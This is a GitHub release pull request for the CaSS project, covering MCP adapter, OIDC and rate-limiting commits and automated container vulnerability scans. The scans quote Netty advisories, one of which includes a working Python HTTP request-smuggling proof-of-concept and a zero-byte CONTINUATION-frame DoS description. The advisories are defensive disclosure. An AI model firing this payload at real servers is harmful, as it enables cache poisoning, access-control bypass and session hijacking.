
Release: v1.6.22#436

Open
github-actions[bot] wants to merge 11 commits into 1.6 from release/draft-1.6-1777038349

Conversation

@github-actions

Automated release PR bumping the version and generating dependency updates. Review the changes and merge this PR into the major/minor target branch when you are ready to publish the Docker images.

Lomilar and others added 10 commits April 21, 2026 17:10
Adds an MCP adapter that exposes CaSS OpenAPI capabilities as tools and resources. This allows AI assistants to discover and invoke CaSS API operations directly. The implementation includes automated tool generation from the OpenAPI spec, a streamable HTTP transport endpoint at /api/mcp, and utility libraries for JSON Schema to Zod conversion.
Replaces the custom streamable HTTP implementation with the official SSEServerTransport from the MCP SDK. This change splits the MCP interface into a GET endpoint for SSE connection establishment and a dedicated POST endpoint for message handling. Additionally, the adapter now strictly loads the OpenAPI spec from the live server endpoint and includes a fix for Zod record schema generation.
Improves the utility of the Model Context Protocol (MCP) adapter by generating detailed tool descriptions that include parameter types, locations, and examples. This change also introduces an 'x-mcp-ignore' OpenAPI extension to exclude administrative, internal, and legacy endpoints from being exposed as LLM tools, ensuring the assistant focuses on relevant data operations. Additionally, it enables an insecure admin mode for development environments via the INSECURE_SERVER_IS_ADMIN flag.
…ned descriptions
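The commits above describe generating tools automatically from the OpenAPI spec and excluding endpoints flagged with the 'x-mcp-ignore' extension. A minimal Python sketch of that idea, assuming a hypothetical spec structure and operation names (not the adapter's actual code, which targets the MCP SDK and Zod):

```python
# Hedged sketch: derive MCP-style tool descriptors from an OpenAPI spec,
# skipping operations flagged with the 'x-mcp-ignore' extension.
def tools_from_openapi(spec: dict) -> list[dict]:
    """Walk an OpenAPI spec and emit one tool descriptor per operation."""
    tools = []
    for path, methods in spec.get("paths", {}).items():
        for method, op in methods.items():
            if op.get("x-mcp-ignore"):  # administrative/internal/legacy endpoints
                continue
            tools.append({
                "name": op.get("operationId", f"{method}_{path}"),
                "description": op.get("summary", ""),
                "inputSchema": {
                    "type": "object",
                    "properties": {
                        p["name"]: p.get("schema", {})
                        for p in op.get("parameters", [])
                    },
                },
            })
    return tools

# Hypothetical spec fragment for illustration.
spec = {
    "paths": {
        "/api/data/{id}": {
            "get": {
                "operationId": "getData",
                "summary": "Fetch a data object",
                "parameters": [{"name": "id", "in": "path",
                                "schema": {"type": "string"}}],
            },
            "delete": {"operationId": "deleteData", "x-mcp-ignore": True},
        }
    }
}
print([t["name"] for t in tools_from_openapi(spec)])  # ['getData']
```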

Enhances the MCP adapter's capability to handle complex API interactions by adding support for multipart/form-data requests and detailed audit logging for tool invocations. This update also refines the auto-generated tool descriptions to provide clearer argument structures for LLMs, introduces basic JSON-LD validation for data persistence, and expands the list of ignored endpoints to further streamline the exposed toolset.
Captures the signature sheet from authentication middleware on each MCP request and propagates it to internal CaSS API calls. This ensures that tool invocations and resource access are performed with the user's identity, replacing the static API key logic with session-based authentication context.
Enables secure Model Context Protocol (MCP) interactions by introducing RFC 8414 Authorization Server Metadata discovery and Bearer token validation. This allows MCP clients to authenticate via OIDC and ensures the server can bridge JWT claims into the internal session context for tool execution.

The update also includes a Keycloak initialization sidecar for automated environment setup and refines the authentication shim to return 401 JSON responses instead of HTML redirects for API-driven clients.
Enables implicit flow in the Keycloak initialization script and removes the 'openid' scope from the shim's filter list to resolve configuration conflicts. Additionally, updates the development workflow in package.json to utilize layered Docker Compose files for OIDC-enabled environments.
Ensures the release workflow explicitly pulls from the gh-pages branch when updating the webapp submodule, rather than relying on the default remote branch.
@github-actions

github-actions Bot commented Apr 24, 2026

Dependency Review

The following issues were found:

  • ✅ 0 vulnerable package(s)
  • ✅ 0 package(s) with incompatible licenses
  • ✅ 0 package(s) with invalid SPDX license definitions
  • ⚠️ 1 package(s) with unknown licenses.
  • ⚠️ 3 package(s) with OpenSSF Scorecard issues.

View full job summary

Comment thread on src/main/server/shims/auth.js (fixed)
Adds `express-rate-limit` middleware to protect against brute-force attempts on sensitive endpoints. This includes separate rate limiters for authentication logic and IP/SSO access guards, which can be toggled using the `CASS_RATE_LIMIT` environment variable.
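The middleware above applies a per-key request limit within a time window. A minimal Python sketch of the fixed-window scheme that express-rate-limit implements by default; the limit and window values are illustrative, not the project's configuration:

```python
# Hedged sketch of fixed-window rate limiting keyed by client identifier (e.g. IP).
import time
from collections import defaultdict

class FixedWindowLimiter:
    def __init__(self, limit: int, window_seconds: float):
        self.limit = limit
        self.window = window_seconds
        # per-key state: [window_start_time, request_count]
        self.counts: dict[str, list] = defaultdict(lambda: [0.0, 0])

    def allow(self, key: str) -> bool:
        now = time.monotonic()
        entry = self.counts[key]
        if now - entry[0] >= self.window:   # window expired: start a fresh one
            entry[0], entry[1] = now, 0
        if entry[1] >= self.limit:          # over the limit: reject
            return False
        entry[1] += 1
        return True

limiter = FixedWindowLimiter(limit=3, window_seconds=60)
results = [limiter.allow("10.0.0.1") for _ in range(5)]
print(results)  # [True, True, True, False, False]
```

Separate limiter instances for the authentication path and the IP/SSO guards, as the commit describes, keep a flood against one endpoint from starving the other.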
@sonarqubecloud

Quality Gate failed

Failed conditions
8.7% Coverage on New Code (required ≥ 80%)

See analysis details on SonarQube Cloud

@github-actions

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass:latest

📦 Image Reference cass-cass:latest
digest: sha256:0616cee7eb79f1e3f0296f058e89dea86510ca6a2df10943b6e5245f3bcf5584
vulnerabilities: critical: 0, high: 0, medium: 0, low: 0
platform: linux/amd64
size: 268 MB
packages: 724
📦 Base Image node:24-bookworm-slim
also known as
  • 24-slim
  • 24.15-bookworm-slim
  • 24.15-slim
  • 24.15.0-bookworm-slim
  • 24.15.0-slim
  • krypton-bookworm-slim
  • krypton-slim
  • lts-bookworm-slim
  • lts-slim
digest: sha256:eebb3322e27acec1dc74482790f744cf04a4932277c232568b4f07cad242821c
vulnerabilities: critical: 0, high: 1, medium: 4, low: 25

@github-actions

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass-alpine:latest

📦 Image Reference cass-cass-alpine:latest
digest: sha256:e4aa9c56b071b0d77350296585bc6d4c5076c1cd575014714e640d8d1b862e19
vulnerabilities: critical: 0, high: 0, medium: 0, low: 0
platform: linux/amd64
size: 227 MB
packages: 616
📦 Base Image node:24-alpine
also known as
  • 24-alpine3.23
  • 24.15-alpine
  • 24.15-alpine3.23
  • 24.15.0-alpine
  • 24.15.0-alpine3.23
  • krypton-alpine
  • krypton-alpine3.23
  • lts-alpine
  • lts-alpine3.23
digest: sha256:8e2c930fda481a6ec141fe5a88e8c249c69f8102fe98af505f38c081649ea749
vulnerabilities: critical: 0, high: 1, medium: 3, low: 0

@github-actions

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass-distroless:latest

📦 Image Reference cass-cass-distroless:latest
digest: sha256:79413548097766d799e398939a8e4a93427ac3a3a9e71fe46773290b04fd3028
vulnerabilities: critical: 0, high: 2, medium: 0, low: 0
platform: linux/amd64
size: 99 MB
packages: 603
📦 Base Image gcr.io/distroless/static-debian12:latest
digest: sha256:340ba156c899ddac5ba57c5188b8e7cd56448eb7ee65b280574465eac2718ad2
vulnerabilities: critical: 0, high: 0, medium: 0, low: 0

node 24.14.0 (generic): critical: 0, high: 2, medium: 0, low: 0

pkg:generic/node@24.14.0

high: CVE-2026-21710
Affected range: >=24.0.0, <24.14.1
Fixed version: 24.14.1
EPSS Score: 0.028%
EPSS Percentile: 8th percentile

high: CVE-2026-21637
Affected range: >=24.0.0, <24.14.1
Fixed version: 24.14.1
EPSS Score: 0.044%
EPSS Percentile: 14th percentile

@github-actions

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass-standalone:latest

📦 Image Reference cass-cass-standalone:latest
digest: sha256:8985db815fd0230241037de080be100937d964b1039d99fd75a88968f68f6fdb
vulnerabilities: critical: 0, high: 2, medium: 0, low: 0
platform: linux/amd64
size: 1.1 GB
packages: 1301
📦 Base Image ubuntu:24.04
also known as
  • latest
  • noble
digest: sha256:98ff7968124952e719a8a69bb3cccdd217f5fe758108ac4f21ad22e1df44d237
vulnerabilities: critical: 0, high: 0, medium: 11, low: 8

io.netty/netty-codec-http2 4.1.130.Final (maven): critical: 0, high: 1, medium: 0, low: 0

pkg:maven/io.netty/netty-codec-http2@4.1.130.Final

high 8.7: CVE-2026-33871 Allocation of Resources Without Limits or Throttling

Affected range: <4.1.132.Final
Fixed version: 4.1.132.Final
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.025%
EPSS Percentile: 7th percentile
Description

Summary

A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server's lack of a limit on the number of CONTINUATION frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows a user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive.

Details

The vulnerability exists in Netty's DefaultHttp2FrameReader. When an HTTP/2 HEADERS frame is received without the END_HEADERS flag, the server expects one or more subsequent CONTINUATION frames. However, the implementation does not enforce a limit on the count of these CONTINUATION frames.

The key issue is located in codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java. The verifyContinuationFrame() method checks for stream association but fails to implement a frame count limit.

Any user can exploit this by sending a stream of CONTINUATION frames with a zero-byte payload. While Netty has a maxHeaderListSize protection to limit the total size of headers, this check is never triggered by zero-byte frames. The logic effectively evaluates to maxHeaderListSize - 0 < currentSize, which will not trigger the limit until a non-zero byte is added. As a result, the server is forced to process an unlimited number of frames, consuming a CPU thread and monopolizing the connection.

codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java

verifyContinuationFrame() (lines 381-393) — No frame count check:

private void verifyContinuationFrame() throws Http2Exception {
    verifyAssociatedWithAStream();
    if (headersContinuation == null) {
        throw connectionError(PROTOCOL_ERROR, "...");
    }
    if (streamId != headersContinuation.getStreamId()) {
        throw connectionError(PROTOCOL_ERROR, "...");
    }
    // NO frame count limit!
}

HeadersBlockBuilder.addFragment() (lines 695-723) — Byte limit bypassed by 0-byte frames:

// Line 710-711: This check NEVER fires when len=0
if (headersDecoder.configuration().maxHeaderListSizeGoAway() - len <
        headerBlock.readableBytes()) {
    headerSizeExceeded();  // 10240 - 0 < 1 => FALSE always
}

When len=0, the check maxHeaderListSizeGoAway - 0 < readableBytes evaluates to 10240 < 1, which is always FALSE. The byte limit is never triggered.
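The mitigation implied above is to cap the number of CONTINUATION frames per header block in addition to the byte-size check that zero-length frames bypass. A hedged Python sketch of that idea; the class, method names, and the limit of 64 are illustrative, not Netty's actual fix:

```python
# Hedged sketch: add a frame-count cap alongside the byte-size check,
# which zero-length fragments never trigger.
MAX_CONTINUATION_FRAMES = 64  # hypothetical cap

class HeadersBlock:
    def __init__(self, max_header_list_size: int = 10240):
        self.max_size = max_header_list_size
        self.size = 0
        self.frames = 0

    def add_fragment(self, fragment: bytes) -> None:
        self.frames += 1
        if self.frames > MAX_CONTINUATION_FRAMES:
            # New count-based check: stops the zero-byte flood.
            raise ValueError("too many CONTINUATION frames")
        self.size += len(fragment)
        if self.size > self.max_size:
            # Existing byte-based check: never fires for b"" fragments.
            raise ValueError("header list too large")

block = HeadersBlock()
try:
    for _ in range(1000):          # simulated flood of zero-byte fragments
        block.add_fragment(b"")
except ValueError as e:
    print(e)                       # too many CONTINUATION frames
```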

Impact

This is a CPU-based Denial of Service (DoS). Any service using Netty's default HTTP/2 server implementation is impacted. An unauthenticated user can exhaust server CPU resources and block legitimate users, leading to service unavailability. The low bandwidth requirement for the attack makes it highly practical.

io.netty/netty-codec-http 4.1.130.Final (maven): critical: 0, high: 1, medium: 0, low: 0

pkg:maven/io.netty/netty-codec-http@4.1.130.Final

high 7.5: CVE-2026-33870 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Affected range: <4.1.132.Final
Fixed version: 4.1.132.Final
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score: 0.014%
EPSS Percentile: 3rd percentile
Description

Summary

Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.

Background

This vulnerability is a new variant discovered during research into the "Funky Chunks" HTTP request smuggling techniques. The original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.

Technical Details

RFC 9112 Section 7.1 defines chunked transfer encoding:

chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string

RFC 9110 Section 5.6.4 defines quoted-string:

quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE

Critically, the allowed character ranges within a quoted-string are:

qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text
quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text )

CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).
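The qdtext ranges quoted above can be checked mechanically; a small Python helper as a sketch (the function name is ours, not from any HTTP library):

```python
# Hedged helper encoding the RFC 9110 qdtext byte ranges quoted above.
# CR (0x0D) and LF (0x0A) fall outside every range and must be rejected.
def is_qdtext(byte: int) -> bool:
    return (byte in (0x09, 0x20, 0x21)    # HTAB / SP / %x21
            or 0x23 <= byte <= 0x5B       # %x23-5B
            or 0x5D <= byte <= 0x7E       # %x5D-7E
            or 0x80 <= byte <= 0xFF)      # obs-text

print(is_qdtext(0x0D), is_qdtext(0x0A), is_qdtext(ord("a")))  # False False True
```

Note that DQUOTE (0x22) and backslash (0x5C) are also excluded from qdtext; they are only legal via the quoted-pair escape.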

Vulnerability

Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.

Expected behavior (RFC-compliant):
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.

Actual behavior (Netty):

Chunk: 1;a="value
            ^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request

The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.

Proof of Concept

#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break

sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))

Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.

Parsing Breakdown

Parser                 | Request 1        | Request 2
Netty (vulnerable)     | POST / body="X"  | GET /smuggled (SMUGGLED)
RFC-compliant parser   | 400 Bad Request  | (none — malformed request rejected)

Impact

  • Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
  • Cache Poisoning: Smuggled responses may poison shared caches.
  • Access Control Bypass: Smuggled requests can circumvent frontend security controls.
  • Session Hijacking: Smuggled requests may intercept responses intended for other users.

Reproduction

  1. Start the minimal proof-of-concept environment using the provided Docker configuration.
  2. Execute the proof-of-concept script included in the attached archive.

Suggested Fix

The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:

1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
   a. For each byte before the terminating CRLF:
      - If CR (%x0D) or LF (%x0A) is encountered outside the
        final terminating CRLF, reject the request with 400 Bad Request.
   b. If the extension value begins with DQUOTE, validate that all
      enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
   outside any quoted-string context and contains no preceding
   illegal bytes.
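The rejection steps above can be sketched in Python. This is a simplified illustration under two stated assumptions: the input is a single chunk-size line with its CRLF already stripped, and quoted-pair escapes inside the extension value are ignored for brevity (a complete parser must handle them):

```python
# Hedged sketch of the suggested fix: reject bare CR/LF in the chunk header
# and reject a quoted-string that is never closed before the line terminator,
# since such a quote could only "close" by swallowing the CRLF (the smuggling
# vector described above).
def parse_chunk_header(line: bytes) -> int:
    """Parse one chunk-size line (CRLF excluded); raise ValueError -> 400 Bad Request."""
    if b"\r" in line or b"\n" in line:
        raise ValueError("illegal CR/LF in chunk header")
    size_part, _, ext = line.partition(b";")
    # Odd number of DQUOTEs means an unterminated quoted-string
    # (quoted-pair escapes are ignored in this sketch).
    if ext.count(b'"') % 2 == 1:
        raise ValueError("unterminated quoted-string in chunk extension")
    return int(size_part.strip(), 16)

print(parse_chunk_header(b'1;a="ok"'))  # 1
try:
    parse_chunk_header(b'1;a="')        # quote left open, as in the PoC above
except ValueError as e:
    print(e)
```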

Acknowledgments

Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.

Attachments

Vulnerability Diagram

java_netty.zip
